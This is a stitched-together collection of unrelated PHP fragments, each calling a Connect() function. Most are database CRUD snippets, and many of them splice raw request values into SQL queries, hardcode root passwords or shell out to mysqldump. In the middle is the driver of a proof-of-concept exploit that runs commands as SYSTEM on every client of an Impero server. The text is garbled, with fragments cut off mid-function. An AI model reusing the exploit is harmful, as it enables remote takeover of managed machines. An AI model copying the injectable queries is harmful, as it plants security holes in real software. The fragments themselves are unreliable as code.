public function GetUser($config, $id)
{
switch ($config['adapter']) {
case 'Mysql':
include "../modules/Application/src/Application/Model/Mysql/Connect.php";
include "../modules/Application/src/Application/Model/Mysql/Select.php";
$master = $config['dbmaster'];
$slave = $config['dbslave'];
$link = Connect($master);
$query = "SELECT * FROM user WHERE iduser='******'";
$data = Select($query, $link);
$data = $data[0];
break;
case 'Txt':
include "../modules/Application/src/Application/Model/Txt/SelectOne.php";
$data = SelectOne($config['filename'], $id);
break;
}
return $data;
}
function UpdateUser($config, $id, $data)
{
$rows = array();
switch ($config['adapter']) {
case 'Mysql':
include '../modules/Application/src/Application/Model/Mysql/Execute.php';
include '../modules/Application/src/Application/Model/Mysql/Connect.php';
$link = Connect($config['slave']);
$query = "UPDATE user SET ";
foreach ($data as $key => $value) {
echo "<pre>key:";
print_r($key);
echo "</pre>";
echo "<pre>value:";
print_r($value);
echo "</pre>";
}
die;
$rows = Execute($link, $query);
break;
case 'Txt':
include '../modules/Application/src/Application/Model/Txt/Delete.php';
$rows = Update($id, $data, $config['userfilename']);
break;
}
return $rows;
}
public static function get_pages($lang = FALSE)
{
if ($lang == FALSE) {
$lang = Settings::get_lang();
}
$pages = self::$ci->page_model->get_lang_list(false, $lang);
// Should never be displayed : no pages are set.
if (empty($pages)) {
show_error('Internal error : <b>No pages found.</b><br/>Solution: <b>Create at least one online page.</b>', 500);
exit;
}
/* Spread authorizations from parents pages to chidrens.
* This adds the group ID to the childrens pages of a protected page
* If you don't want this, just uncomment this line.
*/
if (Connect()->logged_in()) {
self::$user = Connect()->get_current_user();
}
self::$ci->page_model->spread_authorizations($pages);
// Filter pages regarding the authorizations
$pages = array_values(array_filter($pages, array(__CLASS__, '_filter_pages_authorization')));
// Set all abolute URLs one time, for perf.
self::init_absolute_urls($pages, $lang);
return $pages;
}
function insertion_Genre($Genre)
{
$pdo = Connect();
foreach ($Genre as $val) {
$sql_search = "SELECT `genres` FROM 'name' WHERE `genres`.'name'=" . $val;
}
}
function Query($query)
{
global $connected;
if (!$connected) {
Connect();
}
$result = mysql_query($query) or die(mysql_error());
return $result;
}
function dumpDB()
{
$link = Connect();
$query = $link->prepare("SELECT word,answer FROM ia_dictionary");
// change to match your db
$query->execute();
$res = $query->fetchall(PDO::FETCH_ASSOC);
return $res;
}
function jobList()
{
include 'connect.php';
$conn = Connect();
$list = $conn->query("SELECT * FROM JOB_TITLE JOIN DEPARTMENT ON dept_id = DEPARTMENT_dept_id");
while ($row = $list->fetch_assoc()) {
echo "<option value='" . $row['job_id'] . "'>" . $row['job_title'] . " - " . $row['dept_name'] . "</option>";
}
$conn->close();
}
function premierepage()
{
$dbh = Connect();
$sql = "SELECT nom\n\t\t\tfrom utilisateur";
$query = $dbh->query($sql);
if ($query) {
return $query->fetchAll();
} else {
return false;
}
}
function SyncServers()
{
$sync = new articaSMTPSync();
if (!is_array($sync->serverList)) {
writelogs("No servers aborting", __FUNCTION__, __FILE__, __LINE__);
return;
}
while (list($server, $array) = each($sync->serverList)) {
$port = $array["PORT"];
$user = $array["user"];
$password = $array["password"];
Connect($server, $port, $user, $password);
}
}
function InsertUser($config, $data, $filename)
{
$rows = array();
switch ($config['adapter']) {
case 'Mysql':
include '../modules/Application/src/Application/Model/Mysql/Execute.php';
include '../modules/Application/src/Application/Model/Mysql/Connect.php';
$link = Connect($config['slave']);
$query = 'INSERT INTO user (iduser, name, email, password, photo, description, bdate, city_idcity, gender_idgender) VALUES ' . '("4", "' . $data['name'] . '", "' . $data['email'] . '", "' . $data['password'] . '", "' . $_FILES['photo']['name'] . '", "' . $data['description'] . '", "' . $data['bdate'] . '", 1, 1)';
$rows = Execute($link, $query);
break;
case 'Txt':
include "../modules/Application/src/Application/Model/Txt/Insert.php";
Insert($_POST, $filename);
break;
}
// Obtener nombre de la imagen subida
$_POST['photo'] = $_FILES['photo']['name'];
// Comprobar si el nombre de archivo existe
$dir = $_SERVER['DOCUMENT_ROOT'] . '/img/';
$files = scandir($dir);
if (in_array($_POST['photo'], $files)) {
// Si existe se concatena con un numero
// Comprobar si hay algun otro archivo con el mismo nombre y un numero concatenado
$filtrado = "/" . substr($_POST['photo'], 0, -4) . "*/";
$extension = substr($_POST['photo'], -3);
$filesMatch = array();
foreach ($files as $archivo) {
$ext2 = substr($archivo, -3);
if (preg_match($filtrado, $archivo) && $extension === $ext2) {
$filesMatch[] = (int) substr($archivo, strrpos($archivo, "_") + 1, strlen($archivo));
}
}
$filesMatchAux = range(1, max($filesMatch));
$missing = array_diff($filesMatchAux, $filesMatch);
if (count($missing) > 0) {
$_POST['photo'] = substr($_POST['photo'], 0, -4) . '_' . min($missing) . '.' . $extension;
} else {
$_POST['photo'] = substr($_POST['photo'], 0, -4) . '_' . (max($filesMatch) + 1) . '.' . $extension;
}
}
// Declarar destino donde guardar la imagen
$destination = $_SERVER['DOCUMENT_ROOT'] . '/img/' . $_POST['photo'];
// Pasarla de ruta temporal a ruta fisica en el servidor
move_uploaded_file($_FILES['photo']['tmp_name'], $destination);
return $rows;
}
function saveSeats($seats)
{
clearTableSeats();
$conn = Connect();
if ($seats) {
foreach ($seats as $seat) {
$seatAvailable = $seat['seatAvailable'];
if ($seatAvailable == 'x') {
$seatAvailable = 0;
}
$seatNumber = $seat['seatNumber'];
$sql = "INSERT INTO seats \n (seatAvailable,seatNumber)\n VALUES \n ({$seatAvailable},{$seatNumber})";
$conn->query($sql);
}
$conn->close();
}
}
function DeleteUser($config, $id)
{
$rows = array();
switch ($config['adapter']) {
case 'Mysql':
include '../modules/Application/src/Application/Model/Mysql/Execute.php';
include '../modules/Application/src/Application/Model/Mysql/Connect.php';
$link = Connect($config['slave']);
$query = "DELETE FROM user WHERE iduser=" . $id;
$rows = Execute($link, $query);
break;
case 'Txt':
include '../modules/Application/src/Application/Model/Txt/Delete.php';
$rows = Delete($id, $config['userfilename']);
break;
}
return $rows;
}
function GetUsers($config)
{
$rows = array();
switch ($config['adapter']) {
case 'Mysql':
include '../modules/Application/src/Application/Model/Mysql/connect.php';
include '../modules/Application/src/Application/Model/Mysql/Select.php';
$link = Connect($config['slave']);
$query = "SELECT * FROM user";
$rows = Select($link, $query);
break;
case 'Txt':
include '../modules/Application/src/Application/Model/Txt/Select.php';
$rows = Select($config['userfilename']);
break;
}
return $rows;
}
function GetUsers($config)
{
switch ($config['adapter']) {
case 'Mysql':
include "../modules/Application/src/Application/Model/Mysql/Connect.php";
include "../modules/Application/src/Application/Model/Mysql/Select.php";
$master = $config['dbmaster'];
$slave = $config['dbslave'];
$link = Connect($master);
$query = "SELECT * FROM user";
$data = Select($query, $link);
break;
case 'Txt':
include "../modules/Application/src/Application/Model/Txt/Select.php";
$data = Select($config['filename']);
break;
}
return $data;
}
function GetUser($config, $id)
{
$rows = array();
switch ($config['adapter']) {
case 'Mysql':
include '../modules/Application/src/Application/Model/Mysql/connect.php';
include '../modules/Application/src/Application/Model/Mysql/Select.php';
$link = Connect($config['slave']);
$query = "SELECT * FROM user WHERE iduser=" . $id;
$rows = Select($link, $query);
return $rows[0];
break;
case 'Txt':
include '../modules/Application/src/Application/Model/Txt/SelectOne.php';
$rows = SelectOne($config['userfilename'], $id);
return $rows;
break;
}
}
function DeleteUser($config, $id)
{
switch ($config['adapter']) {
case 'Mysql':
include "../modules/Application/src/Application/Model/Mysql/Connect.php";
include "../modules/Application/src/Application/Model/Mysql/Execute.php";
$master = $config['dbmaster'];
$slave = $config['dbslave'];
$link = Connect($master);
$query = "DELETE FROM user WHERE iduser='******'";
$data = Execute($query, $link);
break;
case 'Txt':
include "../modules/Application/src/Application/Model/Txt/Delete.php";
$data = Delete($config['filename'], $id);
break;
}
return $data;
}
echo "[*] Example of this: " . $argv[0] . " detect vboxnet0 192.168.56.255\n";
echo "[*] This PoC will pop a calc and run whoami > C:\\lol.txt as SYSTEM on *every connected client*!\n";
die;
}
array_shift($argv);
foreach ($argv as $key => $arg) {
$detected = false;
if ($arg == "detect") {
if ($key + 2 >= count($argv)) {
continue;
}
echo "[*] Finding Impero server...\n";
$arg = FindImperoServer($argv[$key + 1], $argv[$key + 2]);
if ($arg == false) {
die("[-] Cannot find Impero server\n");
}
echo "[+] Found Impero server at " . $arg . "\n";
$detected = true;
}
$h = Connect($arg);
if ($h === false) {
continue;
}
$clients = GetAllClients($h);
RunExeAsSystem($h, $clients, "calc");
RunCmd($h, $clients, "whoami > C:\\lol.txt");
echo "\n";
if ($detected) {
die;
}
}
if ($user != "" && $pass != "") {
$pass = md5($pass);
$user = htmlentities($user, ENT_QUOTES, "UTF-8");
$user = mysql_real_escape_string($user);
$pass = mysql_real_escape_string($pass);
$result = mysql_query("SELECT * FROM users where alias = '{$user}' AND pass = '******'");
$num_rows = mysql_num_rows($result);
return $num_rows;
} else {
return 0;
}
}
//========================================================================
// main
//========================================================================
Connect();
$open = htmlentities($_POST["positions"], ENT_QUOTES, 'UTF-8');
$close = htmlentities($_POST["historyall"], ENT_QUOTES, 'UTF-8');
$user = htmlentities($_POST["user"], ENT_QUOTES, 'UTF-8');
$pass = htmlentities($_POST["pass"], ENT_QUOTES, 'UTF-8');
$account = htmlentities($_POST["account"], ENT_QUOTES, 'UTF-8');
$balance = htmlentities($_POST["balance"], ENT_QUOTES, 'UTF-8');
$equity = htmlentities($_POST["equity"], ENT_QUOTES, 'UTF-8');
$time = time();
if (!userExist($user, $pass)) {
/* echo "[ER_USER]"; */
}
// open and update positions in database
if (!empty($open)) {
// split positions line
$openall = explode("|", substr($open, 0, -1));
/**
* Returns the base URL of the website, with or without lang code in the URL
*
*/
public static function tag_base_url($tag)
{
// don't display the lang URL (by default)
$lang_url = false;
// The lang code in the URL is forced by the tag
$force_lang = isset($tag->attr['force_lang']) ? true : false;
// Set all languages online if connected as editor or more
if (Connect()->is('editors', true)) {
Settings::set_all_languages_online();
}
if (isset($tag->attr['lang']) && strtolower($tag->attr['lang']) == 'true' or $force_lang === true) {
if (count(Settings::get_online_languages()) > 1) {
// forces the lang code to be in the URL, for each language
// if ($force_lang === true)
// {
return base_url() . Settings::get_lang() . '/';
// }
// More intelligent : Detects if the current lang is the default one and don't return the lang code
/*
else
{
if (Settings::get_lang() != Settings::get_lang('default'))
{
return base_url() . Settings::get_lang() .'/';
}
}
*/
}
}
return base_url();
}
<html>
<head>
<title>Export données décès ch-hyeres</title>
</head>
<body>
<?php
include "fonctions.inc";
$conn = Connect("REF");
//Constitution de la balise Entete au format XML
$nomForm = "DECES";
/*$idActeur=475;
$cleDepot="UtXSgA";
$mail="*****@*****.**";*/
$idActeur = 241;
$cleDepot = "RYBEA8";
$mail = "*****@*****.**";
$arRequis = 1;
$cfg_expediteur_alerte = "siou_ref";
$chemin = "/home/batch/arh/to_be_treated/";
$date_jour = date("Ymd");
$jour = substr($date_jour, 6, 2);
$mois = substr($date_jour, 4, 2);
$annee = substr($date_jour, 0, 4);
$date_file = date("YmdHis");
$date_envoi = date("d/m/Y à H:i:s");
$date_event = date("d/m/Y", mktime(0, 0, 0, $mois, $jour - 1, $annee));
$balise_element = "\n<entete>";
$balise_element .= "\n<idActeur>{$idActeur}</idActeur>";
$balise_element .= "\n<cleActeur>{$cleDepot}</cleActeur>";
$balise_element .= "\n<arRequis>{$arRequis}</arRequis>";
function step_eight()
{
$r = $_SESSION['post_vars'];
$db = Connect();
$name = htmlspecialchars($r['forum_name']);
$description = htmlspecialchars($r['forum_description']);
$db->Query("INSERT INTO " . FORUMS . " (name, description, row_left, row_right, styleset) VALUES ('{$name}', '{$description}', 1, 6, 1)");
$db->Query("INSERT INTO " . FORUMS . " (name, description, row_left, row_right, styleset, row_level, f_order) VALUES ('Test Category', '', 2, 5, 1, 1, 1)");
$db->Query("INSERT INTO " . FORUMS . " (name, description, row_left, row_right, styleset, row_level, f_order) VALUES ('Test Forum', 'If you can see this, your forum is working.', 3, 4, 1, 2, 1)");
$new_url = null;
/* Strip out the first ../ and the /config -> relative url returns the relative path from the install folder to that area */
$url = explode('/', RelativeUrl($r['configurl']));
for ($i = 1; $i < count($url) - 1; $i++) {
$new_url .= $url[$i] . '/';
}
if (substr($new_url, strlen($new_url) - 7) == '/config') {
$new_url = substr($new_url, 0, strlen($new_url) - 7);
}
$text = "<?php\n";
$text .= "/* k4 Bulletin Board - Installed on " . date("F j, Y, g:i a", time()) . " */\n";
$text .= "define('PC_REL_URL', '" . $new_url . "/pagecraft.php');\n";
$text .= "?>";
if ($fp = fopen('../install.lock.php', 'w+')) {
fwrite($fp, $text);
}
if (!isset($_SESSION['local_error']) || !$_SESSION['local_error'] || $_SESSION['local_error'] == FALSE) {
@mail("peter.goodman@gmail.com, " . $r['admin_email'], "k4 Bulletin Board Installation", "k4 Bulletin Board has been installed at: " . $_SERVER['HTTP_HOST'] . ".", "From: \"k4 Bulletin Board Mailer\" <" . $r['webmaster_email'] . ">");
}
}
/**
* Returns a tokken based on the current session ID + the encryption key : md5($this->session->userdata('session_id') . config_item('encryption_key'))
* If the user isn't connected, returns an empty string
*
* Called through XHR when the filemanager is opened.
* The tokken is send with the uploaded data and checked before anything is uploaded
*
*/
function get_tokken()
{
if (Connect()->is('editors')) {
$tokken = md5(session_id() . config_item('encryption_key'));
$this->session->set_userdata('uploadTokken', $tokken);
echo json_encode(array('tokken' => $tokken));
} else {
echo json_encode(array('tokken' => ''));
}
die;
}
<?php
require_once "Connect.php";
$projectID = $_GET["projectID"];
try {
// Return project metadata in JSON format.
$sql = "SELECT\n\t\ta.arm_num,\n\t\ta.arm_name,\n\t\te.descrip,\n\t\tm.form_name,\n\t\tm.field_order,\n\t\tm.field_name,\n\t\tm.element_label,\n\t\tm.element_type,\n\t\tm.element_enum,\n\t\tm.element_validation_min,\n\t\tm.element_validation_max,\n\t\tm.element_validation_type\n\tFROM\n\t\tredcap_events_arms a,\n\t\tredcap_events_metadata e,\n\t\tredcap_metadata m\n\tWHERE\n\t\t\ta.arm_id = e.arm_id\n\t\tAND m.project_id = a.project_id\n\t\tAND a.project_id = " . $projectID . " " . "\n\tORDER BY\n\t\ta.arm_id,\n\t\te.event_id,\n\t\tm.form_name,\n\t\tm.field_order";
$fields = array();
header('Content-type: application/json');
echo '{"fields":[';
$rows = Connect()->query($sql);
$index = 0;
foreach ($rows as $row) {
$fields = array("arm_numb" => $row["arm_num"], "arm_name" => $row["arm_name"], "evnt_nam" => $row["descrip"], "frm_name" => $row["form_name"], "fld_indx" => $row["field_order"], "fld_name" => $row["field_name"], "fld_labl" => $row["element_label"], "fld_type" => $row["element_type"], "fld_enum" => $row["element_enum"], "fld_vmin" => $row["element_validation_min"], "fld_vmax" => $row["element_validation_max"], "fld_vtyp" => $row["element_validation_type"]);
$sTemp = array('fields' => $fields);
$sTemp1 = json_encode($sTemp);
$sTemp1 = substr($sTemp1, 10);
if ($index == $rows->rowCount() - 1) {
$sTemp1 = substr($sTemp1, 0, -1);
// don't add comma to last row
} else {
$sTemp1 = substr_replace($sTemp1, ',', -1, 1);
}
echo $sTemp1;
flush();
++$index;
}
echo ']}';
} catch (PDOException $e) {
echo $e->getMessage();
}
/**
* Constructor
*
*/
public function __construct()
{
parent::__construct();
$this->load->helper('module_helper');
// Redirect the not authorized user to the login panel. See /application/config/connect.php
Connect()->restrict_type_redirect = array('uri' => config_item('admin_url') . '/user/login', 'flash_msg' => 'You have been denied access to %s', 'flash_use_lang' => false, 'flash_var' => 'error');
// $this->output->enable_profiler(true);
// PHP standard session is mandatory for FileManager authentication
// and other external lib
// session_start();
// Librairies
$this->connect = Connect::get_instance();
// Current user
$this->template['current_user'] = $this->connect->get_current_user();
// Set the admin theme as current theme
Theme::set_theme('admin');
/*
* Admin languages : Depending on installed translations in /application/languages/
* The Admin translations are only stored in the translation file /application/languages/xx/admin_lang.php
*
*/
// Set admin lang codes array
Settings::set('admin_languages', $this->settings_model->get_admin_langs());
Settings::set('displayed_admin_languages', explode(',', Settings::get('displayed_admin_languages')));
// Set Router's found language code as current language
Settings::set('current_lang', config_item('language_abbr'));
// Load the current language translations file
$this->lang->load('admin', Settings::get_lang());
/*
* Modules config
*
*/
$this->get_modules_config();
// Including all modules languages files
require APPPATH . 'config/modules.php';
$this->modules = $modules;
foreach ($this->modules as $module) {
$lang_file = MODPATH . $module . '/language/' . Settings::get_lang() . '/' . strtolower($module) . '_lang.php';
if (is_file($lang_file)) {
include $lang_file;
$this->lang->language = array_merge($this->lang->language, $lang);
unset($lang);
}
}
/*
* Loads all Module's addons
*
*/
$this->_get_modules_addons();
// Load all modules lang files
/*
Look how to make Modules translations available in javascript
Notice : $yhis->lang object is transmitted to JS through load->view('javascript_lang')
if ( ! empty($lang_files))
{
foreach($lang_files as $l)
{
if (is_file($l))
{
// $logical_name = substr($l, strripos($l, '/') +1);
// $logical_name = str_replace('_lang.php', '', $logical_name);
// $this->lang->load($logical_name, Settings::get_lang());
include $l;
$this->lang->language = array_merge($this->lang->language, $lang);
unset($lang);
}
}
}
*/
/*
* Settings
*
*/
// @TODO : Remove this thing from the global CMS. Not more mandatory, but necessary for compatibility with historical version
// Available menus
// Each menu was a root node in which you can put several pages, wich are composing a menu.
// Was never really implemented in ionize historical version, but already used as : menus[0]...
Settings::set('menus', config_item('menus'));
// Don't want to cache this content
$this->output->set_header("Cache-Control: no-store, no-cache, must-revalidate");
$this->output->set_header("Cache-Control: post-check=0, pre-check=0", false);
$this->output->set_header("Pragma: no-cache");
}
<?php
session_start();
error_reporting(0);
function Connect($host, $user, $passwd)
{
if (!($link = mysql_connect($host, $user, $passwd))) {
echo "Error connecting to DDBB.";
exit;
}
return $link;
}
$link = Connect('localhost', 'root', '12345');
//
if ($_POST['submit']) {
$db = "cat3";
$output = shell_exec("c:/xampp/MySQL/bin/mysqldump.exe -u root -p 12345 " . $db);
// ejemplo windows
//$output=shell_exec("/usr/bin/mysqldump -u root -proot ".$db); // ejemplo linux
//
//fijo el date de hoy
$date_month = date('m');
$date_year = date('Y');
$date_day = date('d');
$Date = "{$date_year}-{$date_month}-{$date_day}";
//Archivo
$filename = "bdcat_{$Date}";
if (trim($output) == NULL) {
echo "Error creando el backup de la DB: " . $db;
exit;
}
<?php
include "../config.php";
if (!isset($lang) || empty($lang) || !file_exists("../lang/" . "{$lang}" . ".php")) {
$lang = "language_en";
}
include "../lang/" . "{$lang}" . ".php";
include "../common.php";
$var = $HTTP_POST_VARS;
$db = Connect();
print "<html><body><center>\n";
print "<h1>{$t_loan}</h1>\n";
if ($var['del_prest'] != "") {
$result = mysql_query("DELETE FROM " . $db_prefix . "loan WHERE film_id='" . $var['del_prest'] . "';");
} else {
if ($var['add_prest']) {
$result = mysql_query("INSERT INTO " . $db_prefix . "loan VALUES (null," . $var['film_id'] . ",'" . $var['user'] . "',now());");
}
}
if ($var['del_user'] != "") {
$result = mysql_query("DELETE FROM " . $db_prefix . "loan WHERE person_id=" . $var['del_user'] . ";");
$result = mysql_query("DELETE FROM " . $db_prefix . "person WHERE id=" . $var['del_user'] . ";");
}
if ($var['user']) {
if ($var['add_user']) {
$result = mysql_query("INSERT INTO " . $db_prefix . "person VALUES (null,'" . $var['user'] . "','" . $var['phone'] . "','" . $var['email'] . "');");
$result = mysql_query("SELECT id FROM " . $db_prefix . "person WHERE name='" . $var['user'] . "';");
$arr = mysql_fetch_array($result);
$var['user'] = $arr[0];
mysql_free_result($result);
}
$select = "show databases";
$select = mysql_query($select);
while ($row = mysql_fetch_row($select)) {
?>
<option onclick='form.submit();' value="<?php
echo $row[0];
?>
"><?php
echo $row[0];
?>
</option>
<?php
}
echo '</select>';
}
$link = Connect('localhost', 'root', '');
echo '<form method="post" action="' . $_SERVER['PHP_SELF'] . '?send">';
echo 'Seleciona la Base de Datos que deseas Borrar';
echo '<br>';
echo '<br>';
listar();
global $nueva;
echo '</form>';
if (isset($_GET['send'])) {
echo "Has seleccionado la base " . $_POST['lista'] . " para borrar ";
$nueva = $_POST['lista'];
$_SESSION['nombre'] = $nueva;
echo "<FORM ACTION=borrar01.php METHOD=post>";
echo "<INPUT TYPE=submit NAME=submit VALUE=Borrar><BR>";
echo "</FORM>";
echo "<br>";
<?php
include "../config.php";
if (!isset($lang) || empty($lang) || !file_exists("../lang/" . "{$lang}" . ".php")) {
$lang = "language_en";
}
include "../lang/" . "{$lang}" . ".php";
include "../common.php";
$database = Connect();
if ($HTTP_POST_VARS['id_country']) {
$var = $HTTP_POST_VARS;
$result = mysql_query("UPDATE " . $db_prefix . "country SET name='" . $var['name'] . "' WHERE id=" . $var['id'] . ";");
print " <center><h1>" . $end . "</h1>";
if ($result) {
print $correct . " (" . $var['name'] . ")\n";
}
print "<br><br><a href=\"index.php\"><img src=\"../img/back.png\" border=0></a></center>";
} else {
if ($HTTP_POST_VARS['id']) {
$result = mysql_query("SELECT name FROM " . $db_prefix . "country WHERE id='" . $HTTP_POST_VARS['id'] . "';");
$arr = mysql_fetch_array($result);
mysql_free_result($result);
print "<html><body>\n";
print "<center><h1>" . $e_country . "</h1><form action=\"edit_country.php\" method=\"post\">\n";
print "<input type=\"hidden\" name=\"id_country\" value=1>\n";
print "<input type=\"hidden\" name=\"id\" value=\"" . $HTTP_POST_VARS['id'] . "\">\n";
print "<table>\n";
print "<tr><td>" . $country . ": </td><td><input type=\"text\" name=\"name\" value=\"{$arr['0']}\"></td></tr>\n";
print "</table>";
print "<br><input type=\"submit\" value=\"{$change}\">";
print "</form>\n";
<?php
include '../include/connect.php';
$conn = Connect();
$emp_fname = $_POST['emp_fname'];
$emp_lname = $_POST['emp_lname'];
$emp_mname = $_POST['emp_mname'];
$emp_gender = $_POST['emp_gender'];
$job = $_POST['job'];
$insert = $conn->prepare("INSERT INTO EMPLOYEE (emp_firstname, emp_lastname, emp_middlename, emp_gender, JOB_TITLE_job_id) VALUES ('{$emp_fname}', '{$emp_lname}', '{$emp_mname}', '{$emp_gender}', '{$job}')");
$insert->execute();
if (!$insert->error) {
echo "Inserted successfully";
echo "Returning to previous page in 5 seconds";
header('refresh: 5; url=../addemp.php');
} else {
echo "Failed to add employee data";
echo "Returning to previous page in 5 seconds";
header('refresh: 5; url=../addemp.php');
}
$conn->close();
function upload()
{
// Upload folder
$upload_path = config_item('fancyupload_folder');
// Upload result
$return = array();
/**
* Get the connected users data
* These data are encrypted through the CI Encryption library
*
*/
if (empty($this->encrypt)) {
$this->load->library('encrypt');
}
$username = $this->encrypt->decode(rawurldecode($_POST['usrn']));
$email = $this->encrypt->decode(rawurldecode($_POST['usre']));
// Try to get the user
$user = Connect()->get_user($username);
// If we have an user and an upload path
if ($user && $upload_path != false && $upload_path != '') {
// Users group
$usergroup = Connect()->get_group($user['id_group']);
// Fancy upload upload allowed group
$fancygroup = Connect()->get_group(config_item('fancyupload_group'));
/**
* If the users email and the users group has the right to upload,
* we can start uploading
*
*/
if ($user['email'] == $email && $usergroup['level'] >= $fancygroup['level']) {
// Do we get a file ?
if (!isset($_FILES['Filedata']) || !is_uploaded_file($_FILES['Filedata']['tmp_name'])) {
$this->error(lang('module_fancyupload_invalid_upload'));
} else {
// Before move : Clean the file name
// and add user email to file name if defined
$new_file_name = $this->_prep_filename($this->clean_file_name($_FILES['Filedata']['name']));
if (config_item('fancyupload_file_prefix') == '1') {
$new_file_name = $email . '_' . $new_file_name;
}
if (!@move_uploaded_file($_FILES['Filedata']['tmp_name'], config_item('fancyupload_folder') . $new_file_name)) {
$return['status'] = '0';
} else {
$return['status'] = '1';
// Send an alert mail to the admin if the option is set.
if (config_item('fancyupload_send_alert') == '1' && config_item('fancyupload_email') != '') {
$to = config_item('fancyupload_email');
$subject_admin = lang('fancyupload_alert_mail_subject') . ' : ' . $user['screen_name'];
// Email preparation
$data = array('username' => $user['username'], 'screen_name' => $user['screen_name'], 'email' => $user['email'], 'filename' => $new_file_name, 'upload_date' => date('d.m.Y H:i:s'), 'upload_folder' => config_item('fancyupload_folder'));
// Email to Admin
$message = $this->load->view('emails/fancyupload_upload_admin_alert', $data, true);
$this->send_mail($to, $message, $subject_admin);
}
}
$return['src'] = config_item('fancyupload_folder') . $new_file_name;
}
} else {
$this->error(lang('module_fancyupload_no_right'));
}
}
echo json_encode($return);
}
